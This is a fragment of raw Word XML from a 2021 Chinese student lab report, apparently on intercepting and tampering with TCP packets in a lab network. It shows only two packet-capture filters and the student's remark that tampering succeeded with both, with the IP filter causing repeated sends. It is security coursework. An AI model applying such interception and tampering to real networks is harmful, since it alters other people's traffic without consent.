        </w:rPr>
        <w:t>问题5：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FBD62D" w14:textId="08EF4D26" w:rsidR="00423BF0" w:rsidRDefault="00423BF0" w:rsidP="003B020D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先将过滤器改为</w:t>
      </w:r>
      <w:r w:rsidRPr="00423BF0">
        <w:t xml:space="preserve">tcp and src </w:t>
      </w:r>
      <w:r w:rsidR="00D50B0A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:r w:rsidR="00D50B0A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00423BF0">
        <w:t>10.9.0.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6F5D28" w14:textId="057D1A8C" w:rsidR="00573236" w:rsidRDefault="00573236" w:rsidP="003B020D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新运行并进行tcp连接后，结果如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B701E63" w14:textId="0B82736A" w:rsidR="00573236" w:rsidRDefault="00465177" w:rsidP="003B020D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26925438" wp14:editId="3A1B0AC9">
            <wp:extent cx="5274310" cy="18135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213E" w14:textId="2A5049AD" w:rsidR="00465177" w:rsidRDefault="00465177" w:rsidP="003B020D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="652738F4" w14:textId="39C921B1" w:rsidR="00465177" w:rsidRDefault="00465177" w:rsidP="003B020D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再将过滤器改为</w:t>
      </w:r>
      <w:r w:rsidRPr="00465177">
        <w:t>tcp and ether src 02:42:0a:09:00:05</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D90104" w14:textId="79ACFC46" w:rsidR="00573236" w:rsidRDefault="00465177" w:rsidP="003B020D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FE4F1BA" wp14:editId="637C6596">
            <wp:extent cx="5274310" cy="15424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F865" w14:textId="2F843B58" w:rsidR="007F61DB" w:rsidRDefault="007F61DB" w:rsidP="003B020D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EE57429" w14:textId="3ECBF184" w:rsidR="007F61DB" w:rsidRPr="009C0581" w:rsidRDefault="007F61DB" w:rsidP="003B020D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虽然二者都成功纂改，但当使用IP地址作为过滤器时，程序</w:t>
      </w:r>
      <w:r w:rsidR="00E407BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送了大量报文。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="007F61DB" w:rsidRPr="009C058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F368B" w14:textId="77777777" w:rsidR="00C57206" w:rsidRDefault="00C57206" w:rsidP="000A75EE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4DB5B8AD" w14:textId="77777777" w:rsidR="00C57206" w:rsidRDefault="00C57206" w:rsidP="000A75E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4AE4A" w14:textId="77777777" w:rsidR="000A75EE" w:rsidRDefault="000A75E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E6232" w14:textId="77777777" w:rsidR="000A75EE" w:rsidRDefault="000A75E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6796A" w14:textId="77777777" w:rsidR="000A75EE" w:rsidRDefault="000A75E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6A2FF" w14:textId="77777777" w:rsidR="00C57206" w:rsidRDefault="00C57206" w:rsidP="000A75EE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="22845F3E" w14:textId="77777777" w:rsidR="00C57206" w:rsidRDefault="00C57206" w:rsidP="000A75E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F4E53" w14:textId="77777777" w:rsidR="000A75EE" w:rsidRDefault="000A75E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86070" w14:textId="77777777" w:rsidR="000A75EE" w:rsidRDefault="000A75E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3B65C" w14:textId="77777777" w:rsidR="000A75EE" w:rsidRDefault="000A75E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37"/>
    <w:rsid w:val="000A75EE"/>
    <w:rsid w:val="000E1384"/>
    <w:rsid w:val="00390FAC"/>
    <w:rsid w:val="003B020D"/>
    <w:rsid w:val="00405737"/>
    <w:rsid w:val="00423BF0"/>
    <w:rsid w:val="00465177"/>
    <w:rsid w:val="00490019"/>
    <w:rsid w:val="004A2D32"/>
    <w:rsid w:val="00530E67"/>
    <w:rsid w:val="00537816"/>
    <w:rsid w:val="00573236"/>
    <w:rsid w:val="005831C8"/>
    <w:rsid w:val="005E66E5"/>
    <w:rsid w:val="006C1ACA"/>
    <w:rsid w:val="007F61DB"/>
    <w:rsid w:val="00852D83"/>
    <w:rsid w:val="009455BC"/>
    <w:rsid w:val="009A5D1E"/>
    <w:rsid w:val="009C0581"/>
    <w:rsid w:val="00BC2B40"/>
    <w:rsid w:val="00C32D2F"/>
    <w:rsid w:val="00C57206"/>
    <w:rsid w:val="00D50B0A"/>
    <w:rsid w:val="00E407BA"/>
    <w:rsid w:val="00EC7092"/>
    <w:rsid w:val="00FB192E"/>
    <w:rsid w:val="00FE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25A0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2BFBFEDA-AD70-45DE-AD63-4E087D8E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75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7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7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扶影</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>柳 扶影</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-13T13:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-13T14:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>